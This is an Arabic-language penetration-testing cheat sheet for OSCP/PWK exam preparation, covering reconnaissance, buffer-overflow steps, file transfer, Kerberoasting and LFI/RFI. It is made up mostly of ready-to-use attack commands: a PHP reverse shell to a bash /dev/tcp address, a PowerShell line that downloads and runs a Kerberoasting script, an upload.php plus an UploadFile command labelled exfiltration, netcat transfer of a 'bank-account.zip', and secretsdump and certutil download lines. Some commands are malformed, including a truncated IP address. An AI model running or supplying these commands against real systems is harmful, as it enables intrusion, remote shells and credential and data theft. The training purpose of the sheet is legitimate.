
ورقة غش شاملة لاختبار الاختراق لتحضير امتحان PWK/OSCP، تغطي تصعيد الامتيازات، كسر كلمات المرور، توليد الحمولات، ما بعد الاستغلال، فحص المنافذ، الهجمات على الويب، وتقنيات الاستطلاع.
JustTryHarder هو مرجع سريع سيساعدك خلال دورة PWK وامتحان OSCP.
(مستوحى من PayloadAllTheThings)
لا تتردد في تقديم Pull Request وترك نجمة لمشاركة الحب إذا ساعدك هذا. 💖
صديق لـ Hacktoberfest! نعم، نحن منفتحون لطلبات Pull Requests لـ Hacktoberfest! يرجى التأكد من أنها ليست بريدًا عشوائيًا وتساهم فعليًا بشكل جيد في هذا المستودع. شكرًا واستمتع بالاختراق!
إخلاء مسؤولية: لا شيء مما يلي يحتوي على حرق لمختبرات PWK / امتحان OSCP.
لقد حصلت على الكثير من هذه المعلومات من خلال مستودعات Github الأخرى والمدونات والمواقع والمزيد. لقد حاولت تقديم أكبر قدر من الإسناد إلى المنشئ الأصلي بقدر الإمكان. إذا لم أقدم لك الإسناد، فيرجى الاتصال بي على Twitter: https://twitter.com/s1nfulz
ping 10.10.10.110 PING 10.10.10.110 (10.10.10.110) 56(84) bytes of data. 64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms
يمكن استخدام `TTL` لتحديد نظام تشغيل المضيف. الأنواع الثلاثة المختلفة من TTL موضحة أدناه:
- **TTL=64** = \*nix - عدد القفزات؛ لذا إذا كنت تحصل على 61، فهناك 3 قفزات وهو جهاز \*nix. على الأرجح Linux.
- **TTL=128** = Windows - مرة أخرى، إذا كان TTL هو 127 فإن القفزة هي 1 وهو جهاز Windows.
- **TTL=254** = Solaris/AIX - إذا كان TTL هو 250 فإن عدد القفزات هو 4 وهو جهاز Solaris.
## BOF (قيد التطوير)
(الأحرف السيئة النموذجية تشمل: `0x00`, `0x0A`, `0x0D`)
- Fuzzing
- إيجاد موضع EIP
- إيجاد الأحرف السيئة
- تحديد موقع `jmp esp`
- إنشاء الحمولة باستخدام `msfvenom`
- الحصول على شل عكسي باستخدام `netcat`
**موارد جيدة حول BOF:**
- [NCC Group - Writing Exploits for Win32](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/)
- [Corelan - Exploit Writing Tutorial Part 1](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)
- [GitHub - dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood)
- [VeteranSec - 32-bit Windows Buffer Overflows Made Easy](https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/)
## عمليات الهروب / الهروب من البيئات
- [Pentest Partners - Breaking out of Citrix](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
- [SRA.io - SiteKiosk Breakout](https://sra.io/blog/sitekiosk-breakout/)
- [TrustedSec - Kiosk/POS Breakout Keys](https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/)
- [Cognosec - Breaking out of Citrix Environment](https://cognosec.com/breaking-out-of-citrix-environment/)
- [NetSPI - Breaking out of Applications](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
- [NCC Group - Common Issues with Environment Breakouts (PDF)](https://research.nccgroup.com/wp-content/uploads/2020/07/research-insights_common-issues-with-environment-breakouts.pdf)
- [GracefulSecurity - Citrix Breakout](https://gracefulsecurity.com/citrix-breakout/)
## DNS - نقل المناطق```bash
host -t axfr HTB.local 10.10.10.10
host -l HTB.local 10.10.10.10
host -l <domain name> <name server>
dig @<dns server> <domain> axfr
```
## نقل الملفات
### نقل SMB
على جهاز الضحية (Windows):```cmd
net share \\10.10.10.10\myshare
net use x:
copy whatever.zip x:
```
### Wget نقل
كيفية استرداد ملف (ملفات) من المضيف (داخل شل عكسية).
**الإعداد:** ضع الملف الذي تريد نقله في `/var/www/html/` وشغل `service apache2 start`.
شغل على الخادم البعيد:```bash
wget [http://10.10.10.10/pspy64](http://10.10.10.10/pspy64) # <- for single file
wget -r [http://10.10.10.10/pspy64/](http://10.10.10.10/pspy64/) # <- for folder
```
### نقل TFTP
(كيفية النقل من Kali إلى Windows).
**باستخدام MSF:**
قم بتشغيل MSF قبل هذه الخطوات:
1. `use auxiliary/server/tftp`
2. `set TFTPROOT /usr/share/mimikatz/Win32/`
3. `run`
**داخل الطرفية:**
4. `tftp -i 10.10.10.10 GET mimikatz.exe`
### NetCat (من Windows إلى Kali)
1. **Windows:** `nc -nv 10.11.0.61 4444 < bank-account.zip`
2. **Linux:** `nc -nlvp 4444 > bank-account.zip`
### PowerShell
جلسة تفاعلية:```powershell
Invoke-WebRequest -Uri [http://127.0.0.1/exploit.py](http://127.0.0.1/exploit.py) -OutFile C:\Users\Victim\exploit.py
```
بدون جلسة باورشيل تفاعلية (أنشئ `wget.ps1`):```powershell
$client = New-Object System.Net.WebClient
$path = "C:\path\to\save\file.txt"
$client.DownloadFile($url, $path)
```
### Base64 (لينكس -> لينكس)
**المضيف المحلي:**
1. `$(echo "cat /path/to/exploit.py | base64") > encoded.b64`
2. انقل `encoded.b64` إلى الخادم البعيد باستخدام `nc` أو بطريقة أخرى.
**الخادم البعيد - لينكس:**
3. `cat /path/to/encoded.b64 | base64 -d > exploit.py`
### Certutil```cmd
certutil.exe -urlcache -split -f "[http://ip.for.kali.box/file-to-get.zip](http://ip.for.kali.box/file-to-get.zip)" name-to-save-as.zip
```
### رفع الملفات عبر HTTP (تسريب)
**1. إنشاء upload.php**
إنشاء في جذر الويب للجهاز المهاجم (`/var/www/html` افتراضيًا).```php
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
```
**2. إنشاء الدليل**
أنشئ دليل الرفع واضبط الأذونات المناسبة للسماح بالرفع.```bash
sudo mkdir /var/www/uploads && sudo chown www-data:www-data /var/www/uploads
```
**3. رفع ملف**
رفع ملف من الجهاز الضحية إلى الجهاز المهاجم باستخدام PowerShell:```powershell
powershell.exe -exec unrestricted -noprofile -Command "(New-Object System.Net.WebClient).UploadFile('[http://10.10.10.10/upload.php](http://10.10.10.10/upload.php)', 'file-to-upload.txt')"
```
## Kerberoasting
- `GetUserSPNs.py -request -dc-ip <DC_IP> <domain\user>`
- `powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat`
- `impacket-secretsdump -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER> -outputfile filename.hashes`
## LFI / RFI
**PHP Reverse Shell:**```php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10/1234 0>&1'"); ?>
```
**حقن الأوامر:**```php
<?php echo shell_exec(whoami);?>
```
## MSSQL / SQLi